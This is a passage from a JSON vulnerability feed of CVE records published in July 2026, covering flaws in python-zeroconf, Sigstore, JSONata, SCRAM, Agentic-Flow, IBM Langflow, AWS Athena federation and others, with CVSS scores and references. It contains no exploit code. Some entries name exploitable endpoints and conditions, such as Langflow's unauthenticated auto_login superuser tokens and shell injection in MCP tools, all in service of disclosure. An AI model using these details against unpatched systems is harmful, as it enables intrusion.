Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/python-zeroconf/python-zeroconf/commit/b22c8ff19c66c68907d220a4823c0950f4fa93f7","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/pull/1751","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/releases/tag/0.149.12","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/security/advisories/GHSA-9663-mqmp-p9mm","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-48487","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:15.963","lastModified":"2026-07-17T19:17:15.963","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Zeroconf is a pure Python implementation of multicast DNS service discovery. Prior to 0.149.16, _read_character_string and _read_string in src/zeroconf/_protocol/incoming.py advanced self.offset by attacker-declared RDLENGTH without checking it against self._data_len, allowing unauthenticated hosts on the local link over UDP/5353 (224.0.0.251 / ff02::fb) to send a TXT, HINFO, or A/AAAA record with rdlength=65535 and seed DNSCache and ServiceInfo.properties with truncated, attacker-shaped key/value or address records. This issue is fixed in version 0.149.16."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"python-zeroconf","product":"python-zeroconf","versions":[{"version":"< 0.149.16","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"ADJACENT","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-130"}]}],"references":[{"url":"https://github.com/python-zeroconf/python-zeroconf/commit/544449596e645fcaad3834fa0cb614a54f847a82","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/issues/1752","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/pull/1756","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/releases/tag/0.149.16","source":"security-advisories@github.com"},{"url":"https://github.com/python-zeroconf/python-zeroconf/security/advisories/GHSA-qc2x-6f54-m6h9","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49835","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:16.227","lastModified":"2026-07-17T20:17:22.627","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Sigstore Timestamp Authority is a service for issuing RFC 3161 timestamps. Prior to 2.1.0, the global wrapMetrics middleware records raw HTTP request path r.URL.Path and raw HTTP request method r.Method as Prometheus labels for latency and request count metric vectors before routing, allowing an unauthenticated remote attacker to issue requests with random paths such as /api/v1/timestamp/<uuid> or random HTTP methods and create unbounded permanent time-series entries that exhaust memory. This issue is fixed in version 2.1.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"sigstore","product":"timestamp-authority","versions":[{"version":"< 2.1.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:45:33.792018Z","id":"CVE-2026-49835","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/sigstore/timestamp-authority/commit/506ec57b6ac2ea1e4739322e47453469425b69b5","source":"security-advisories@github.com"},{"url":"https://github.com/sigstore/timestamp-authority/releases/tag/v2.1.0","source":"security-advisories@github.com"},{"url":"https://github.com/sigstore/timestamp-authority/security/advisories/GHSA-9c54-x2g4-v92j","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-50185","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:16.370","lastModified":"2026-07-17T19:17:16.370","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"RustCrypto CMOV provides conditional move CPU intrinsics which are guaranteed on major platforms to execute in constant-time and not be rewritten as branches by the compiler. From 0.1.1 until 0.5.4, the aarch64 implementations of Cmov and CmovEq in cmov/src/backends/aarch64.rs assume high bits are zero-extended when loading values smaller than a register, so set high bits such as [8..] in a Cmov selector or [16..] of self or other in the u16 and i16 CmovEq implementations can cause left.cmovz(&right, condition) to produce incorrect output. This issue is fixed in version 0.5.4."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"RustCrypto","product":"utils","versions":[{"version":">= 0.1.1, < 0.5.4","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-758"}]}],"references":[{"url":"https://github.com/RustCrypto/utils/commit/dba6c355c9f241e3726d5ec2a68f9f3b519f6063","source":"security-advisories@github.com"},{"url":"https://github.com/RustCrypto/utils/releases/tag/cmov-v0.5.4","source":"security-advisories@github.com"},{"url":"https://github.com/RustCrypto/utils/security/advisories/GHSA-3rjw-m598-pq24","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-52746","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:16.500","lastModified":"2026-07-17T20:17:25.207","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"JSONata is a JSON query and transformation language. Prior to 2.2.0, malicious non-matching inputs to the $toMillis function can cause superlinear backtracking in the ISO-8601 validation regex, leading to denial of service in applications that evaluate user-provided JSONata expressions. This issue is fixed in version 2.2.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"jsonata-js","product":"jsonata","versions":[{"version":"< 2.2.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:44:39.303237Z","id":"CVE-2026-52746","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-1333"}]}],"references":[{"url":"https://github.com/jsonata-js/jsonata/commit/80ba95d170f74e3f20f4f36b8b77d8c85cea7686","source":"security-advisories@github.com"},{"url":"https://github.com/jsonata-js/jsonata/commit/d6ffc17cb16a8e53c222205bd274624e919cce0b","source":"security-advisories@github.com"},{"url":"https://github.com/jsonata-js/jsonata/pull/782","source":"security-advisories@github.com"},{"url":"https://github.com/jsonata-js/jsonata/pull/793","source":"security-advisories@github.com"},{"url":"https://github.com/jsonata-js/jsonata/releases/tag/v2.2.0","source":"security-advisories@github.com"},{"url":"https://github.com/jsonata-js/jsonata/security/advisories/GHSA-86vw-mfpg-wwv9","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-53712","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:16.880","lastModified":"2026-07-17T20:17:25.853","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"SCRAM (Salted Challenge Response Authentication Mechanism) is part of the family of Simple Authentication and Security Layer (SASL, RFC 4422) authentication mechanisms. Prior to 3.3, a flaw in com.ongres.scram:scram-client and com.ongres.scram:scram-common allows an attacker capable of a TLS man-in-the-middle attack to silently downgrade a connection from SCRAM-SHA-256-PLUS with channel binding to standard SCRAM-SHA-256 without channel binding when TlsServerEndpoint processes an X.509 certificate using a modern signature algorithm such as Ed25519; getChannelBindingData() can return an empty byte array after NoSuchAlgorithmException, and the ScramClient builder treats that as absent channel-binding data. This issue is fixed in version 3.3."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"ongres","product":"scram","versions":[{"version":"< 3.3","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:08:59.374984Z","id":"CVE-2026-53712","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-636"},{"lang":"en","value":"CWE-757"}]}],"references":[{"url":"https://github.com/ongres/scram/releases/tag/3.3","source":"security-advisories@github.com"},{"url":"https://github.com/ongres/scram/security/advisories/GHSA-p9jg-fcr6-3mhf","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-58195","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T19:17:17.410","lastModified":"2026-07-17T20:17:27.157","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Agentic-Flow is an AI agent orchestration platform. Prior to 2.0.14, agentic-flow MCP server tools in src/mcp/standalone-stdio.ts, src/mcp/fastmcp/servers/claude-flow-sdk.ts, src/mcp/fastmcp/servers/stdio-full.ts, src/mcp/fastmcp/servers/http-streaming-updated.ts, src/mcp/fastmcp/servers/http-sse.ts, src/mcp/fastmcp/servers/poc-stdio.ts, src/mcp/fastmcp/tools/agent/{execute,list,parallel}.ts, src/mcp/fastmcp/tools/swarm/orchestrate.ts, and src/mcp/fastmcp/tools/hooks/pretrain.ts interpolated attacker-influenceable tool parameters such as agent, task, name, language, and agentdb directly into shell command strings passed to execSync(), allowing arbitrary OS command execution with the privileges of the MCP server user. This issue is fixed in version 2.0.14."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"ruvnet","product":"agentic-flow","versions":[{"version":"< 2.0.14","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:18:22.340611Z","id":"CVE-2026-58195","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-78"}]}],"references":[{"url":"https://github.com/ruvnet/agentic-flow/commit/0c2ec967736a8b6b85832c6bae2a3e74989705ec","source":"security-advisories@github.com"},{"url":"https://github.com/ruvnet/agentic-flow/issues/169","source":"security-advisories@github.com"},{"url":"https://github.com/ruvnet/agentic-flow/pull/170","source":"security-advisories@github.com"},{"url":"https://github.com/ruvnet/agentic-flow/security/advisories/GHSA-vcv2-r9jh-99m5","source":"security-advisories@github.com"},{"url":"https://github.com/ruvnet/ruflo/issues/2414","source":"security-advisories@github.com"},{"url":"https://github.com/ruvnet/ruflo/pull/2415","source":"security-advisories@github.com"},{"url":"https://github.com/ruvnet/ruflo/releases/tag/v3.12.4","source":"security-advisories@github.com"},{"url":"https://github.com/ruvnet/agentic-flow/security/advisories/GHSA-vcv2-r9jh-99m5","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-9103","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T19:17:19.277","lastModified":"2026-07-17T19:17:19.277","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 could allow a remote attacker to gain unauthorized access due to improper authentication in the /api/v1/login/auto_login endpoint. The endpoint issues long-lived superuser bearer tokens without requiring authentication when the AUTO_LOGIN configuration is enabled (enabled by default), which may allow an unauthenticated network attacker to obtain full administrative access. Additionally, permissive cross-origin resource sharing (CORS) settings may allow tokens to be exposed to unintended origins, increasing the risk of unauthorized access."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-306"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7278926","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-9135","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T19:17:19.390","lastModified":"2026-07-17T19:17:19.390","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 Langflow versions up to 1.9.2 (commit 94981c443d4918517b9e8163d70fc598dc33a32d) contain a code injection vulnerability in the Policies component's ToolGuard integration that bypasses the allow_custom_components=false security control. The vulnerability exists because the validation mechanism only checks the main component source code in node_template[\"code\"][\"value\"] but fails to validate dynamic CodeInput fields that store generated ToolGuard Python files. Attackers can embed malicious Python code in these unvalidated dynamic fields, which are persisted in Flow.data and later executed server-side when a guarded tool is invoked through the ToolGuard runtime. This allows authenticated users with flow creation privileges to achieve arbitrary Python code execution on the backend despite custom component restrictions. The vulnerability can be escalated through cross-tenant flow manipulation via the agentic MCP update_flow_component_field tool, which accepts attacker-controlled user_id parameters, enabling attackers to inject malicious code into victim users' flows. When combined with publicly accessible flows and specific misconfigurations (AUTO_LOGIN=true, NEW_USER_IS_ACTIVE=true), the attack can be conducted with reduced authentication requirements."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","baseScore":9.9,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.1,"impactScore":6.0}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7278920","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-9171","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T19:17:19.520","lastModified":"2026-07-17T19:17:19.520","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM PowerVM Novalink are vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to cause the server to consume memory resources."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"PowerVM Novalink","cpes":["cpe:2.3:a:ibm:powervm_novalink:2.2.02.2.12.2.1.1:*:*:*:*:*:*:*","cpe:2.3:a:ibm:powervm_novalink:2.3.02.3.0.12.3.12.3.2:*:*:*:*:*:*:*"],"versions":[{"version":"2.2.02.2.12.2.1.1","status":"affected"},{"version":"2.3.02.3.0.12.3.12.3.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-400"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7280226","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2025-51677","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T20:17:13.763","lastModified":"2026-07-17T20:17:13.763","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in openRISC OR1200 commit 83ac6b. An output mismatch between the RTL and the netlist of the or1200 cpu output port can lead to unexpected behavior."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{},"references":[{"url":"https://github.com/openrisc/mor1kx/issues/160#issuecomment-2585618940","source":"cve@mitre.org"},{"url":"https://mason.gmu.edu/~rsaravan/projects/synfuzz/cve/cve.html","source":"cve@mitre.org"},{"url":"https://www.arxiv.org/abs/2504.18812","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2025-51678","sourceIdentifier":"cve@mitre.org","published":"2026-07-17T20:17:13.887","lastModified":"2026-07-17T20:17:13.887","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in RISC-V PicoRV32 commit 87c89a. A mismatch in the PCPI INSN and memory address can lead to unexpected behavior."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{},"references":[{"url":"https://github.com/YosysHQ/picorv32/issues/269","source":"cve@mitre.org"},{"url":"https://mason.gmu.edu/~rsaravan/projects/synfuzz/cve/cve.html","source":"cve@mitre.org"},{"url":"https://www.arxiv.org/abs/2504.18812","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-12283","sourceIdentifier":"ff89ba41-3aa1-4d27-914a-91399e9639e5","published":"2026-07-17T20:17:14.007","lastModified":"2026-07-17T20:17:14.007","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Amazon Athena is a serverless, interactive query service that lets you analyze data directly in Amazon S3 using standard SQL. Athena Query Federation is a feature that allows you to connect to data sources outside of Amazon S3 like DynamoDB, Azure Synapse, and custom connectors using standard SQL syntax.\n\n\n\nImproper neutralization of special elements used in an SQL command in the Synapse connector in Amazon aws-athena-query-federation v2022.20.1 through v2026.19.1 might allow an authenticated remote user to execute injected read-only SQL queries that return unintended data from the connected database via a crafted table name.\n\n\n\nTo remediate this issue, users should upgrade to version v2026.21.1 or later."}],"affected":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","affectedData":[{"vendor":"AWS","product":"aws-athena-query-federation","defaultStatus":"unaffected","versions":[{"version":"v2022.20.1","lessThanOrEqual":"v2026.19.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"HIGH","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":4.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:43:04.614894Z","id":"CVE-2026-12283","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://aws.amazon.com/security/security-bulletins/2026-059-aws/","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5"},{"url":"https://github.com/awslabs/aws-athena-query-federation/releases/tag/v2026.21.1","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5"},{"url":"https://github.com/awslabs/aws-athena-query-federation/security/advisories/GHSA-43cr-4635-mfjp","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}},{"cve":{"id":"CVE-2026-13448","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:14.713","lastModified":"2026-07-17T20:17:14.713","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.1 Lanflow OSS contains an unauthenticated remote code execution vulnerability in the public flow build endpoint ( /api/v1/build_public_tmp/{flow_id}/flow ). The vulnerability stems from an incomplete denylist in the validate_public_flow_no_code_execution() function that fails to block several code-execution agent components including OpenDsStarAgent, CodeActAgentSmolagents, and CSVAgent."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow 